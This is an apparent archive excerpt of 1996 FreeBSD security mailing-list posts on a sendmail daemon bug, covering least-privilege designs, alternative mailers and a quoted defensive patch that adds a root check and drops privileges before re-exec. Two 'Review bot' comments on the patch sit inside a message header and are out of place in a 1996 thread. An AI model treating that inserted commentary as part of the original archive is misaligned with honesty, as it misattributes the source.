} although these would be the people who were happy when Sun and SCO did
} the same thing. *snort*

I'm doing this to make building firewall boxes easier. The kernel won't be GENERIC, it'll be a pre-configured ultra-paranoid kernel. There won't be any general user accounts. Administrative access will only be allowed from the console or via ssh from a trusted location. Most of userland will only be removed (especially setuid and setgid executables!), leaving only enough to boot the machine and launch the appropriate daemons that were precompiled and included in the release.

In case the machine is compromised or the disk blows up, it is reloaded from a trusted source (not from a backup tape that some cracker managed to leave a back door in). I want this to be an easy task and not require five hours answering questions, editing files, and deleting stuff.

Since I'll be the only person logging in, and I won't be compiling any code on that machine, I don't need a compiler, and I don't want to make it any easier than necessary for some cracker d00d to compile his r00t kit.

And on more of a chat related note, there is a discussion going on over on the hardware list about using FreeBSD for routers. What if it was easier to build really tiny releases for such purposes? If they were small enough, you could get it to all fit on a floppy (sort of like the current install floppy) and you could build a router or other simple dedicated device without a hard disk at all. You'd still need a full FreeBSD box around to do development on, but this would allow you to deploy a number of really cheap FreeBSD boxes on your network as dedicated devices.

Please follow up only to the appropriate places.

--- Truck

From owner-freebsd-security Mon Nov 18 02:15:13 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA28081 for security-outgoing; Mon, 18 Nov 1996 02:15:13 -0800 (PST) Received: from mail.id.net (mail.id.net [199.125.1.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id CAA28076 for ; Mon, 18 Nov 1996 02:15:04 -0800 (PST) Received: from server.id.net (server.id.net [199.125.1.10]) by mail.id.net (8.7.5/ID-Net) with ESMTP id FAA11457; Mon, 18 Nov 1996 05:19:53 -0500 (EST) Received: (from rls@localhost) by server.id.net (8.7.5/8.7.3) id FAA11340; Mon, 18 Nov 1996 05:15:05 -0500 (EST)
From: Robert Shady Message-Id: <199611181015.FAA11340@server.id.net> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: from Marc Slemko at "Nov 17, 96 11:55:33 pm" To: marcs@znep.com (Marc Slemko) Date: Mon, 18 Nov 1996 05:15:04 -0500 (EST) Cc: roberto@keltia.freenix.fr, freebsd-security@FreeBSD.org X-Mailer: ELM [version 2.4ME+ PL25 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk

> Incorrect. It RUNS without DNS but still TRIES to use it. If you really
> don't have IP connectivity, then difference doesn't matter because it
> still works when the lookup fails, however it still does try and the
> difference does matter if you have partial IP connectivity. I have a
> system setup with nocanonify and all the other config file tweaks I know
> of, and it still tries to use DNS as a tcpdump shows quite clearly. This
> system is running 8.7.5, so things may have been changed in more recent
> versions but I can't say for sure; if this has changed in more recent
> versions, please let me know.
>
> I _think_ the define that needs to be set to 0 is NAMED_BIND, but don't
> recall for sure. This has been gone over before on the lists.

Out of curiosity, what interface exactly are you looking at if you aren't running tcp/ip?
-- Rob === _/_/_/_/_/ _/_/_/_/ _/_/ _/ _/_/_/_/_/ _/_/_/_/_/ _/ _/ _/ _/_/_/ _/ _/ _/ _/_/_/_/ _/ _/_/_/_/_/ _/_/_/_/ _/ _/ _/_/_/_/_/ _/ Innovative Data Services Serving South-Eastern Michigan Internet Service Provider / Hardware Sales / Consulting Services Voice: (810)855-0404 / Fax: (810)855-3268 / Web: http://www.id.net From owner-freebsd-security Mon Nov 18 04:24:07 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id EAA06612 for security-outgoing; Mon, 18 Nov 1996 04:24:07 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id EAA06592 for ; Mon, 18 Nov 1996 04:23:54 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id HAA12293; Mon, 18 Nov 1996 07:20:17 -0500 
From: Adam Shostack Message-Id: <199611181220.HAA12293@homeport.org> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: from Warner Losh at "Nov 17, 96 09:45:35 pm" To: imp@village.org (Warner Losh) Date: Mon, 18 Nov 1996 07:20:16 -0500 (EST) Cc: freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

Warner Losh wrote:
| In message <9611180312.AA15775@communica.com.au> Mark Newton writes:
| : Removing shell escapes from .forward is, IMHO, of a similar league to
| : disabling the functionality of .rhosts files. Shell escapes are, and always
| : have been, a feature which permits unaccountable abuses of security to
| : provide "ease of use" which only a small subset of users really care about.
| I'm sorry, but that is not an acceptable answer in a general purpose
| OS. What you do on your system is OK, but that is *NOT* a good reason
| to remove sendmail from the base OS. People expect the ability to run
| whatever they please, or at least a subset selected by the admin. In
| order to do that, the mail agent must run as that person. In order to
| do that, the mail agent must either run a setuid program that is
| accessible to the mail delivery agent (and likely others), or it must
| run as root.

The Mail Delivery Agent must run as root, and set its uid to recipient. I've used a non-root sendmail with setuid procmail to make this work just fine.

We should all be thinking in terms of separation of privilege and least privilege.

Adam

-- "It is seldom that liberty of any kind is lost all at once."
-Hume From owner-freebsd-security Mon Nov 18 04:27:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id EAA07238 for security-outgoing; Mon, 18 Nov 1996 04:27:36 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id EAA07233 for ; Mon, 18 Nov 1996 04:27:23 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id HAA12303; Mon, 18 Nov 1996 07:23:29 -0500 
From: Adam Shostack Message-Id: <199611181223.HAA12303@homeport.org> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: from Ollivier Robert at "Nov 18, 96 06:59:34 am" To: roberto@keltia.freenix.fr (Ollivier Robert) Date: Mon, 18 Nov 1996 07:23:29 -0500 (EST) Cc: freebsd-security@FreeBSD.org X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk

Ollivier Robert wrote:
| According to Adam Shostack:
| > planning to replace sendmail with qmail real soon, and that helps me a
| > lot. My suggestion was meant to imply the possibility of removing
| > sendmail from the FreeBSD distribution, and only shipping qmail.
|
| I'd strongly object to this. In addition of what Warner said I must add
| that qmail's UUCP support is nonexistent or rather anti-UUCP in the sense
| that it generates multiple messages when a mail has multiple recipient.
|
| I manage several mailing-lists on my home machine and am the administrator
| of another one with lots of UUCP users and qmail is unusable.

While you raise a valid point, which is UUCP still exists, does it exist in the majority of systems out there? If not, should the default system config include a mailer which is architecturally incapable of being secure? I can't object to your need, and the need of some others, to keep UUCP going, but I'm not convinced that it should be the default for most people.

| I still can't bear the configuration system of qmail (lots of .qmail-mumble
| everywhere, user defined mailing-lists that can't be disabled) and the
| author's attitude in general[1] (but that's another problem).

I'll agree with you wholeheartedly here. Lastly, it seems that author attitudes are inseparable from the kind of hubris needed to write an MTA. :}

Adam

-- "It is seldom that liberty of any kind is lost all at once."
-Hume From owner-freebsd-security Mon Nov 18 05:57:28 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id FAA12511 for security-outgoing; Mon, 18 Nov 1996 05:57:28 -0800 (PST) Received: from postoffice.cso.uiuc.edu (postoffice.cso.uiuc.edu [128.174.5.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id FAA12470; Mon, 18 Nov 1996 05:57:20 -0800 (PST) Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [128.174.83.167]) by postoffice.cso.uiuc.edu (8.6.12/8.6.12) with ESMTP id HAA134502; Mon, 18 Nov 1996 07:54:21 -0600 Received: by alecto.physics.uiuc.edu (940816.SGI.8.6.9/940406.SGI) id HAA04064; Mon, 18 Nov 1996 07:54:00 -0600 Date: Mon, 18 Nov 1996 07:54:00 -0600 
From: igor@alecto.physics.uiuc.edu (Igor Roshchin) Message-Id: <199611181354.HAA04064@alecto.physics.uiuc.edu> To: spork@super-g.com (S), Wolfgang Ley Subject: Re: New sendmail bug... Cc: freebsd-hackers@FreeBSD.org, freebsd-security@FreeBSD.org, roberto@keltia.freenix.fr, igor@alecto.physics.uiuc.edu, eric@sendmail.org Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk

>From ley@cert.dfn.de Mon Nov 18 02:33:06 1996
S wrote:
>
> But if one does have to run 8.7.6 until they have time to breath, does
> anyone know if the error that Igor and I are seeing compiling 8.7.6 from
[...]

That's simply wrong. sendmail 8.7 - 8.8.2 is affected (which includes sendmail 8.7.6). Install 8.8.3 to fix the bug.

Bye, Wolfgang.

This is not the right approach.

1. As somebody has written, people should be able to get sendmail from *.freebsd.org without digging for it. sup.freebsd.org had just 8.7.6 with the patch in question.

2. The patch in question SHOULD work (Somebody showed that the line being discussed is not that important)

3. In general (although it does not seem to be the case now), transition from one version to another one is not a painless process, because of configuration files. This situation can be more sophisticated when you have a cluster of computers with different platforms with common infrastructure.
(I am not getting into details, you know them better than me) IgoR From owner-freebsd-security Mon Nov 18 07:08:17 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA20243 for security-outgoing; Mon, 18 Nov 1996 07:08:17 -0800 (PST) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id HAA20231 for ; Mon, 18 Nov 1996 07:08:08 -0800 (PST) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vPVIl-0004Qy-00; Mon, 18 Nov 1996 08:07:59 -0700 To: Poul-Henning Kamp Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: freebsd-security@freebsd.org In-reply-to: Your message of "Mon, 18 Nov 1996 08:30:43 +0100." <9172.848302243@critter.tfs.com> References: <9172.848302243@critter.tfs.com> Date: Mon, 18 Nov 1996 08:07:59 -0700 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message <9172.848302243@critter.tfs.com> Poul-Henning Kamp writes: : How's that for security ? Cool! Warner From owner-freebsd-security Mon Nov 18 07:14:14 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA20898 for security-outgoing; Mon, 18 Nov 1996 07:14:14 -0800 (PST) Received: from kdat.calpoly.edu (kdat.csc.calpoly.edu [129.65.54.101]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id HAA20884 for ; Mon, 18 Nov 1996 07:14:05 -0800 (PST) Received: (from nlawson@localhost) by kdat.calpoly.edu (8.6.12/N8) id HAA03689; Mon, 18 Nov 1996 07:10:45 -0800 
From: Nathan Lawson Message-Id: <199611181510.HAA03689@kdat.calpoly.edu> Subject: Re: grand alternatives to chroot, solution to the age-old root problem To: dreamer@garrison.inetcan.net (Digital Dreamer) Date: Mon, 18 Nov 1996 07:10:44 -0800 (PST) In-Reply-To: from "Digital Dreamer" at Nov 17, 96 03:31:15 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

> On Sun, 17 Nov 1996, az.com wrote:
>
> > No longer do you have to worry about whether they have root or not - in
> > fact each user gets to be root! (in their own machine, of course ;) ) If
> > they want to hack, get fancy, reboot, etc. - its up to them - its *their*
> > system, not yours.
> >
> > If they blow out the virtual OS space because they gave their password out
> > to a grommet or made a mistake, you simply run a utility which checks and
> > repairs virtual file system's partitions and refreshes the virtual
> > 'environment's' OS from a template.
>
> Sounds nice, but kind of impractical. There's no unice (AFAIK) whose
> kernel could do this without essentially being rewritten. Besides,
> there's still the possibility of kernel bugs that would let you break out
> of your vm and get into that of others.

Back when I first started using UNIX, the school had an IBM 3090 running VM. It has virtual machines and ran AIX, CMS, and several other OS's. All were separate from each other and seemed to run fine, albeit a bit slowly (they were trying to spool all the school's news through it :) Various trusted OS's use the VM concept.

-- Nate Lawson "There are a thousand hacking at the branches of CPE Senior evil to one who is striking at the root."
CSL Admin -- Henry David Thoreau, 'Walden', 1854 From owner-freebsd-security Mon Nov 18 07:15:26 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA21065 for security-outgoing; Mon, 18 Nov 1996 07:15:26 -0800 (PST) Received: from kdat.calpoly.edu (kdat.csc.calpoly.edu [129.65.54.101]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id HAA21058 for ; Mon, 18 Nov 1996 07:15:22 -0800 (PST) Received: (from nlawson@localhost) by kdat.calpoly.edu (8.6.12/N8) id HAA03705; Mon, 18 Nov 1996 07:15:18 -0800 
From: Nathan Lawson Message-Id: <199611181515.HAA03705@kdat.calpoly.edu> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: batie@agora.rdrop.com (Alan Batie) Date: Mon, 18 Nov 1996 07:15:18 -0800 (PST) Cc: freebsd-security@freebsd.org In-Reply-To: from "Alan Batie" at Nov 17, 96 05:16:36 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

> > Sendmail is well understood and well maintained with a very long track
> > record. Other mailers, no matter how much better, don't match this
> > track record.
>
> Yup, sendmail has a long track record of the "security hole of the month";
> I've yet to see one for smail. I would like to switch to sendmail, as I
> hear it deals with mail queues a lot better these days, and smail
> development seems to have gone into a black hole, but until sendmail can
> make it a whole month or two without a CERT advisory on it...

I've had the displeasure of reviewing the Smail code and found it just as convoluted as sendmail, and in fact, just as insecure. Last year, a colleague posted three Smail bugs to Bugtraq. There were many other potential holes, but I stopped the review process and decided to go with a SMAP hybrid. Note that I am not recommending sendmail, but I think your exultation with smail is a bit premature.

-- Nate Lawson "There are a thousand hacking at the branches of CPE Senior evil to one who is striking at the root."
CSL Admin -- Henry David Thoreau, 'Walden', 1854 From owner-freebsd-security Mon Nov 18 07:30:24 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA21993 for security-outgoing; Mon, 18 Nov 1996 07:30:24 -0800 (PST) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id HAA21986 for ; Mon, 18 Nov 1996 07:30:19 -0800 (PST) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id IAA23049; Mon, 18 Nov 1996 08:30:15 -0700 (MST) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id IAA04580; Mon, 18 Nov 1996 08:22:55 -0700 (MST) Date: Mon, 18 Nov 1996 08:22:54 -0700 (MST) 
From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: Poul-Henning Kamp cc: freebsd-security@FreeBSD.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <9172.848302243@critter.tfs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk

What does sendmail need to do WRT binding to ports that a webserver doesn't? Programs such as webservers work quite well with a parent process running as root that binds to the port and forks children running as some non-root uid to handle requests. Why couldn't (this part) of sendmail's problems be fixed the same way?

On Mon, 18 Nov 1996, Poul-Henning Kamp wrote:

> What we REALLY need, is a way for root, to hand out certain privileges.
>
> Imagine this:
>
> sysctl -w net.inet.tcp.uidforport.25=`id -ur smtp`
> sysctl -w net.inet.tcp.uidforport.20=`id -ur ftp`
> sysctl -w net.inet.tcp.uidforport.21=`id -ur ftp`
> sysctl -w net.inet.tcp.uidforport.119=`id -ur nntp`
>
> This means that users with UID smtp can bind to socket 25 (aka smtp),
> and so on. Now sendmail NEVER needs to be root.
>
> How's that for security ?

From owner-freebsd-security Mon Nov 18 07:45:52 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA23046 for security-outgoing; Mon, 18 Nov 1996 07:45:52 -0800 (PST) Received: from knecht.Sendmail.ORG (root@knecht.oxford.reference.com [205.217.47.98]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id HAA23029; Mon, 18 Nov 1996 07:45:43 -0800 (PST) Received: from knecht.Sendmail.ORG (eric@LOCALHOST [127.0.0.1]) by knecht.Sendmail.ORG (8.8.3/8.8.3) with ESMTP id HAA25568; Mon, 18 Nov 1996 07:45:15 -0800 (PST) Message-Id: <199611181545.HAA25568@knecht.Sendmail.ORG> X-Mailer: exmh version 1.6.7 5/3/96 To: "S(pork)"
From: Eric Allman
X-URL: http://WWW.InReference.COM/~eric
cc: Igor Roshchin , Ollivier Robert , freebsd-security@freebsd.org, freebsd-hackers@freebsd.org
Subject: Re: New sendmail bug...
In-reply-to: Mail from "S(pork)" dated Sun, 17 Nov 1996 21:39:11 CST
Date: Mon, 18 Nov 1996 07:45:13 -0800
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

I see there's been a lot of traffic, so this is probably answered already -- but just remove the call to vendor_daemon_setup.

eric

============= In Reply To: ===========================================
: From: "S(pork)"
: Subject: Re: New sendmail bug...
: Date: Sun, 17 Nov 1996 21:39:11 -0600 (CST)
:
: But if one does have to run 8.7.6 until they have time to breathe, does
: anyone know if the error that Igor and I are seeing compiling 8.7.6 from
: -stable can be avoided? I first patched with the 2 line setgid, setuid
: patch I saw on the list, then I grabbed what was in the current -stable
: source and got the same error as Igor. It compiled after deleting the
: line in main.c that I saw in the errors, and it seems to work, but
: reckless deletion scares me. I wonder what the line was for....
:
: Anyhow, any help is appreciated.
:
: Thanks,
:
: Charles
:
: On Sun, 17 Nov 1996, Eric Allman wrote:
:
: > This patch is against 8.8.2, not 8.7.6. You need to upgrade to 8.8;
: > 8.7.x is no longer supported.
: >
: > eric
: >
: >
: > ============= In Reply To: ===========================================
: > :
From: igor@alecto.physics.uiuc.edu (Igor Roshchin) : > : Subject: Re: New sendmail bug... : > : Date: Sun, 17 Nov 1996 21:12:33 -0600 (CST) : > : > : Hello! : > : : > : May be I am missing something, : > : but I was not able to compile the patched version : > : of the sendmail 8.7.6.4, : > : as it appears in FreeBSD distribution (sup.freebsd.org). : > : : > : main.o: Undefined symbol `_vendor_daemon_setup' referenced from text segm ent : > : *** Error code 1 : > : : > : : > : Is it a problem due to the version of FreeBSD ? : > : I tried it on 2.1.5-stable and 2.1.5-release; - : > : results were the same. : > : : > : Thanks in advance for your suggestions. : > : : > : IgoR : > : : > : : > : > : > : > ------- main.c ------- : > : > *** - Wed Dec 31 16:00:00 1969 : > : > --- main.c Sat Nov 16 07:07:17 1996 : > : > *************** : > : > *** 493,507 **** : > : > { : > : > case MD_DAEMON: : > : > case MD_FGDAEMON: : > : > ! # ifdef DAEMON : > : > ! if (RealUid != 0) : > : > ! { : > : > ! usrerr("Permission denied"); : > : > ! exit(EX_USAGE); : > : > ! } : > : > ! vendor_daemon_setup(CurEnv); : > : > ! /* fall through ... */ : > : > ! # else : > : > usrerr("Daemon mode not implemented"); : > : > ExitStat = EX_USAGE; : > : > break; : > : > --- 493,499 ---- : > : > { : > : > case MD_DAEMON: : > : > case MD_FGDAEMON: : > : > ! # ifndef DAEMON : > : > usrerr("Daemon mode not implemented"); : > : > ExitStat = EX_USAGE; : > : > break; : > : > *************** : > : > *** 899,904 **** : > : > --- 891,904 ---- : > : > /* fall through ... 
*/ : > : > : > : > case MD_DAEMON: : > : > + /* check for permissions */ : > : > + if (RealUid != 0) : > : > + { : > : > + usrerr("Permission denied"); : > : > + exit(EX_USAGE); : > : > + } : > : > + vendor_daemon_setup(CurEnv); : > : > + : > : > /* remove things that don't make sense in daemon mode * / : > : > FullName = NULL; : > : > GrabTo = FALSE; : > : > *************** : > : > *** 1932,1937 **** : > : > --- 1932,1946 ---- : > : > syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0] ); : > : > #endif : > : > releasesignal(SIGHUP); : > : > + if (setuid(RealUid) < 0 || setgid(RealGid) < 0) : > : > + { : > : > + #ifdef LOG : > : > + if (LogLevel > 0) : > : > + syslog(LOG_ALERT, "could not set[ug]id(%d, %d): %m", : > : > + RealUid, RealGid); : > : > + #endif : > : > + exit(EX_OSERR); : > : > + } : > : > execv(SaveArgv[0], (ARGV_T) SaveArgv); : > : > #ifdef LOG : > : > if (LogLevel > 0) : > : > : > : > : > : : > : > : > : From owner-freebsd-security Mon Nov 18 07:49:45 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA23256 for security-outgoing; Mon, 18 Nov 1996 07:49:45 -0800 (PST) Received: from fps.biblos.unal.edu.co ([168.176.37.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id HAA23238 for ; Mon, 18 Nov 1996 07:49:30 -0800 (PST) 
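Review bot: in the second hunk (the `*** 899,904 ****` block, the MD_DAEMON case) the `vendor_daemon_setup(CurEnv)` call that the first hunk removed is put back, but the 8.7.6 tree has no such function, which is exactly the `Undefined symbol _vendor_daemon_setup` link error Igor reports above; as posted, the patch only links against 8.8.x. For 8.7.x either drop that one line, as Eric says, or supply an empty vendor_daemon_setup(), but keep the `if (RealUid != 0)` "Permission denied" check, which is the part of the hunk that matters.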
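Review bot: in the third hunk (the `*** 1932,1937 ****` block, the restart-on-SIGHUP path before execv) the new condition calls `setuid(RealUid)` before `setgid(RealGid)`. Once setuid() has made the process non-root, a setgid() to a group other than its current real or saved gid fails with EPERM, so the sequence should be `setgid(RealGid)` first and `setuid(RealUid)` second; with the order as written such a process logs `could not set[ug]id` and exits EX_OSERR instead of re-executing. Dropping back to the invoking user's ids before the re-exec is the right fix; only the order needs swapping.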
From: pgiffuni@fps.biblos.unal.edu.co
Received: from localhost by fps.biblos.unal.edu.co (AIX 4.1/UCB 5.64/4.03) id AA20872; Mon, 18 Nov 1996 10:53:24 -0500
Date: Mon, 18 Nov 1996 10:53:24 -0500 (EST)
To: Warner Losh
Cc: Mark Newton , Alan Batie , adam@homeport.org, freebsd-security@freebsd.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Sun, 17 Nov 1996, Warner Losh wrote:

> In message <9611180247.AA15359@communica.com.au> Mark Newton writes:
> : indeed, precisely what I have done with it here at Communica, where
> : sendmail runs as the unprivileged "smtp" user).
>
> I don't buy this. You need to be able to create a mailbox of an
>
> What am I missing?
>

I haven't done that either, but some firewall software does it. I only change the daemon's uid in the sendmail.cf so that it will use an unprivileged user that doesn't even own a shell, as is explained in the CERT advisory.

Pedro.

> Warner
>

From owner-freebsd-security Mon Nov 18 08:07:05 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA24036 for security-outgoing; Mon, 18 Nov 1996 08:07:05 -0800 (PST)
Received: from fps.biblos.unal.edu.co ([168.176.37.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA24024 for ; Mon, 18 Nov 1996 08:06:42 -0800 (PST)
From: pgiffuni@fps.biblos.unal.edu.co
Received: from localhost by fps.biblos.unal.edu.co (AIX 4.1/UCB 5.64/4.03) id AA24360; Mon, 18 Nov 1996 11:11:29 -0500
Date: Mon, 18 Nov 1996 11:11:29 -0500 (EST)
To: Marc Slemko
Cc: Warner Losh , Mark Newton , freebsd-security@freebsd.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Sun, 17 Nov 1996, Marc Slemko wrote:

>
> This would be implemented with either one big program or, more likely,
> a bunch of little programs with a consistent pretty (ie. sysinstall
> like, although libdialog is ugly) interface and a parent program that
> lets you run any of them. Perhaps some day I will get around to
> trying to make such a program.
>

AIX has a nice program (probably just a script) called securetcpip. You run it once and it closes tftp, rlogin, and a bunch of services. The disadvantage is that if you run it you'll probably have to reinstall to open one of the "unsecure" services. Probably it's a complement to a C2 security package.

For the time being the logical choice is to correctly configure the newest sendmail, port other mailers and pray !
Pedro

From owner-freebsd-security Mon Nov 18 08:45:16 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA26200 for security-outgoing; Mon, 18 Nov 1996 08:45:16 -0800 (PST)
Received: from who.cdrom.com (who.cdrom.com [204.216.27.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id IAA26195; Mon, 18 Nov 1996 08:45:12 -0800 (PST)
Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by who.cdrom.com (8.7.5/8.6.11) with SMTP id IAA08736 ; Mon, 18 Nov 1996 08:45:05 -0800 (PST)
Received: from crevenia.parc.xerox.com ([13.2.116.11]) by alpha.xerox.com with SMTP id <17373(1)>; Mon, 18 Nov 1996 08:42:59 PST
Received: from localhost ([127.0.0.1]) by crevenia.parc.xerox.com with SMTP id <177557>; Mon, 18 Nov 1996 08:42:47 -0800
X-Mailer: exmh version 1.6.7 5/3/96
To: Don Lewis
cc: Michael Smith , chat@freebsd.org, security@freebsd.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
In-reply-to: Your message of "Mon, 18 Nov 1996 01:18:36 PST." <199611180918.BAA15007@salsa.gv.ssi1.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 18 Nov 1996 08:42:36 PST
From: Bill Fenner
Message-Id: <96Nov18.084247pst.177557@crevenia.parc.xerox.com>
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

In message <199611180918.BAA15007@salsa.gv.ssi1.com> you write:
>I don't need a compiler, and I don't want to make
>it any easier than necessary for some cracker d00d to compile his r00t
>kit.

If you want to save space, that's fine, but don't delude yourself by thinking that your cracker d00d can't just go find someone on IRC with a FreeBSD box who will send him binaries.

Bill

From owner-freebsd-security Mon Nov 18 08:50:59 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA26511 for security-outgoing; Mon, 18 Nov 1996 08:50:59 -0800 (PST)
Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA26505 for ; Mon, 18 Nov 1996 08:50:55 -0800 (PST)
Received: from crevenia.parc.xerox.com ([13.2.116.11]) by alpha.xerox.com with SMTP id <17036(6)>; Mon, 18 Nov 1996 08:50:20 PST
Received: from localhost ([127.0.0.1]) by crevenia.parc.xerox.com with SMTP id <177557>; Mon, 18 Nov 1996 08:50:03 -0800
X-Mailer: exmh version 1.6.7 5/3/96
To: Michael Smith
cc: freebsd-security@freebsd.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
In-reply-to: Your message of "Sun, 17 Nov 1996 19:35:04 PST." <199611180335.OAA17231@genesis.atrad.adelaide.edu.au>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 18 Nov 1996 08:50:01 PST
From: Bill Fenner
Message-Id: <96Nov18.085003pst.177557@crevenia.parc.xerox.com>
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

In message <199611180335.OAA17231@genesis.atrad.adelaide.edu.au> you write:
>...if it were possible to be non-root and bind to port 25...

It is, of course, possible to run as root for *just long enough* to bind to port 25. Then setuid("smtp").

Bill

From owner-freebsd-security Mon Nov 18 08:54:44 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA26854 for security-outgoing; Mon, 18 Nov 1996 08:54:44 -0800 (PST)
Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA26842 for ; Mon, 18 Nov 1996 08:54:39 -0800 (PST)
Received: from crevenia.parc.xerox.com ([13.2.116.11]) by alpha.xerox.com with SMTP id <17573(5)>; Mon, 18 Nov 1996 08:53:29 PST
Received: from localhost ([127.0.0.1]) by crevenia.parc.xerox.com with SMTP id <177557>; Mon, 18 Nov 1996 08:53:04 -0800
X-Mailer: exmh version 1.6.7 5/3/96
To: Warner Losh
cc: newton@communica.com.au (Mark Newton), batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
In-reply-to: Your message of "Sun, 17 Nov 1996 20:45:35 PST."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 18 Nov 1996 08:53:00 PST
From: Bill Fenner
Message-Id: <96Nov18.085304pst.177557@crevenia.parc.xerox.com>
Sender: owner-security@freebsd.org
